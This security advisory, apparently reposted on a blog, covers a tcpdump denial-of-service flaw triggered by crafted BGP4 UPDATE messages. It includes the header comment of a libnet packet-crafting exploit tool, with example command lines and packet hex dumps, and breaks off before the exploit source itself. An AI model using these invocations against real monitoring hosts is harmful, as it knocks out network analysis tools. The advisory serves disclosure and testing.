The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Tcpdump Remote Denial of Service Exploit (bgp_update_print)
------------------------------------------------------------------------
SUMMARY
" <http://www.tcpdump.org/> tcpdump is a program used to dump network
traffic for TCP/IP networks. The information can be used by a wide variety
of network analysis programs, either via piping or by saving the stream to
a file for later analysis."
By sending a specially crafted BGP4 message to a server running tcpdump,
it is possible to crash the target application.
DETAILS
Vulnerable Systems:
* libnet version 1.1.
Exploit:
/*
* 2005-05-31: Modified by simon@FreeBSD.org to test tcpdump infinite
* loop vulnerability.
*
* libnet 1.1
* Build a BGP4 update message with what you want as payload
*
* Copyright (c) 2003 Fr d ric Raynal <pappy at security-labs organization>
* All rights reserved.
*
* Examples:
*
* empty BGP UPDATE message:
*
* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2
* libnet 1.1 packet shaping: BGP4 update + payload[raw]
* Wrote 63 byte TCP packet; check the wire.
*
* 13:44:29.216135 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
* 16843009:16843032(23) win 32767: BGP (ttl 64, id 242, len 63)
* 0x0000 4500 003f 00f2 0000 4006 73c2 0101 0101 E..?....@.s.....
* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
* 0x0020 5002 7fff b288 0000 0101 0101 0101 0101 P...............
* 0x0030 0101 0101 0101 0101 0017 0200 0000 00 ...............
*
*
* BGP UPDATE with Path Attributes and Unfeasible Routes Length
*
* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2 -a `printf "\x01\x02\x03"` -A 3 -W
13
* libnet 1.1 packet shaping: BGP4 update + payload[raw]
* Wrote 79 byte TCP packet; check the wire.
*
* 13:45:59.579901 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
* 16843009:16843048(39) win 32767: BGP (ttl 64, id 242, len 79)
* 0x0000 4500 004f 00f2 0000 4006 73b2 0101 0101 E..O....@.s.....
* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
* 0x0020 5002 7fff 199b 0000 0101 0101 0101 0101 P...............
* 0x0030 0101 0101 0101 0101 0027 0200 0d41 4141 .........'...AAA
* 0x0040 4141 4141 4141 4141 4141 0003 0102 03 AAAAAAAAAA.....
*
*
* BGP UPDATE with Reachability Information
*
* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2 -I 7
* libnet 1.1 packet shaping: BGP4 update + payload[raw]
* Wrote 70 byte TCP packet; check the wire.
*
* 13:49:02.829225 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
* 16843009:16843039(30) win 32767: BGP (ttl 64, id 242, len 70)
* 0x0000 4500 0046 00f2 0000 4006 73bb 0101 0101 E..F....@.s.....
* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
* 0x0020 5002 7fff e86d 0000 0101 0101 0101 0101 P....m..........
* 0x0030 0101 0101 0101 0101 001e 0200 0000 0043 ...............C
* 0x0040 4343 4343 4343 CCCCCC
*
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY
WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
/* #if (HAVE_CONFIG_H) */
/* #include "../include/config.h" */
/*
No comments:
Post a Comment